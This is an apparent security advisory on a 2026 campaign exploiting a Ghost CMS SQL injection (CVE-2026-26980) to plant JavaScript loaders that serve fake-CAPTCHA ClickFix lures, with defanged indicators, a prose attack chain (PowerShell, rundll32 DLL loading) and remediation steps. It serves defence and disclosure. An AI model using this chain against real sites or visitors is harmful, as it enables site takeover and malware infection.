Ghost CMS Flaw Abused to Push ClickFix Attacks on Hundreds of Sites

Executive Summary

A critical SQL injection vulnerability in Ghost CMS—patched in February, but left unaddressed on hundreds of sites—is now fueling a large-scale ClickFix malware campaign… and it’s getting out of hand. Over 700 legitimate domains have been poisoned, including university portals and major technology brands. The attackers are exploiting the trust we place in legitimate publishers, and it’s a ruthless campaign.

What Happened

So, what’s going on here? In early May 2026, researchers at QiAnXin XLab uncovered a sweeping campaign targeting Ghost CMS installations that had never been updated to the February 2026 security patch. The attackers are using a playbook that’s simple, yet effective: find a vulnerable Ghost site, extract its administrative credentials, silently alter published content, and use that content to serve malware. And because the compromised domains include well-known universities like Harvard and Oxford, alongside companies like DuckDuckGo, the social-engineering lures benefit from the credibility of the host site. XLab describes the operation as a “large-scale poisoning” campaign involving at least two distinct threat clusters.

Technical Details

The root cause of all this is CVE-2026-26980, a SQL injection flaw in Ghost’s Content API discovered by security researchers. This vulnerability carries a CVSS score of 9.4 and affects Ghost CMS versions 3.24.0 through 6.19.0. It allows an unauthenticated remote attacker to read arbitrary data from the backend database—including the Admin API key. That key is the crown jewel: with it, an attacker gains full access to Ghost’s administrative API, enabling them to modify published articles. The attackers abuse this capability to append a lightweight JavaScript loader to the bottom of compromised pages. The loader doesn’t contain the final payload… instead, it reaches out to attacker-controlled infrastructure—specifically clo4shara[.]xyz/11z77u3.php—to retrieve a second-stage cloaking script powered by Adspect, a commercial cloaking-as-a-service platform. Its job is to fingerprint every visitor: browser, geolocation, referrer, and whether the request appears to originate from a security scanner or a real human. Only visitors that meet the attacker’s targeting criteria are served the actual malicious content. Those selected victims see a fake Cloudflare verification page inside an iframe that instructs them to prove they are human. This is the ClickFix trap. The page tells the user to press Windows+R, paste a Base64-encoded command, and press Enter… and that’s when the real damage happens. The command downloads a ZIP archive, extracts a batch script, and executes a PowerShell one-liner that fetches a DLL from a remote server, launches it with rundll32.exe, and opens a decoy webpage. Later iterations swapped the DLL for a JavaScript payload. Regardless of the delivery mechanism, the end goal is the same: drop and execute a Windows binary. XLab observed multiple final payloads, including a code-signed PuTTY client and an Electron application named UtilifySetup.exe—a modified version of the open-source Grape desktop client. It establishes persistence and polls a command-and-control server at web-telegram[.].

Impact

Over 700 domains have been confirmed compromised, spanning personal blogs, technology sites, AI and SaaS platforms, media outlets, cryptocurrency projects, fintech firms, and educational institutions. Victims include household names in privacy, academia, and cybersecurity. The impact extends beyond site owners… every visitor to a poisoned article who falls for the fake CAPTCHA becomes a potential malware victim. Because the lure is served from a trusted domain, even security-conscious users may be caught off guard. The use of cloaking further complicates detection, as automated scanners often see only benign content. This campaign is a clear example of how a single vulnerability can have far-reaching consequences.

What To Do Now

For Ghost CMS administrators, the response must be immediate and thorough. Patch now—upgrade to Ghost CMS 6.19.1 or later without delay. The fix has been available since February; every day of delay is another day of exposure. Rotate credentials: all Admin API keys, secrets, and credentials that existed before patching must be considered compromised and rotated immediately. Clean house: injected scripts are embedded in articles at the database level. Administrators must inspect the database and published HTML to ensure all malicious code is removed. Audit logs: maintain at least 30 days of admin API call logs and review them for unauthorized access patterns or unexpected key usage. Alert visitors: if your site was compromised, notify users who may have visited affected articles during the contamination window. They should scan their systems for signs of infection.

Timeline

Date	Event
February 16, 2026	Ghost CMS v6.19.1 patch released. Malicious tooling compiled the same day.
February 19, 2026	CVE-2026-26980 is publicly disclosed.
February 27, 2026	SentinelOne publishes exploitation details and detection guidance.
Early May 2026	First signs of large-scale exploitation activity appear.
May 7, 2026	QiAnXin XLab first detects the active poisoning campaign.
May 24, 2026	BleepingComputer reports on the campaign, confirming 700+ compromised domains.

Sources

1. BleepingComputer. “Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign.” May 24, 2026. https://www.bleepingcomputer.com/news/security/ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/
2. The Hacker News. “Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks.” May 25, 2026. https://thehackernews.com/2026/05/ghost-cms-cve-2026-26980-exploited-to.html
3. Security Affairs. “Ghost CMS flaw abused to push ClickFix attacks on hundreds of sites.” May 25, 2026. https://securityaffairs.com/192655/cyber-crime/ghost-cms-flaw-abused-to-push-clickfix-attacks-on-hundreds-of-sites.html
4. Ghost (TryGhost). “Ghost v6.19.1 Release.” February 16, 2026. https://github.com/TryGhost/Ghost/releases/tag/v6.19.1
5. Ghost Community Forum.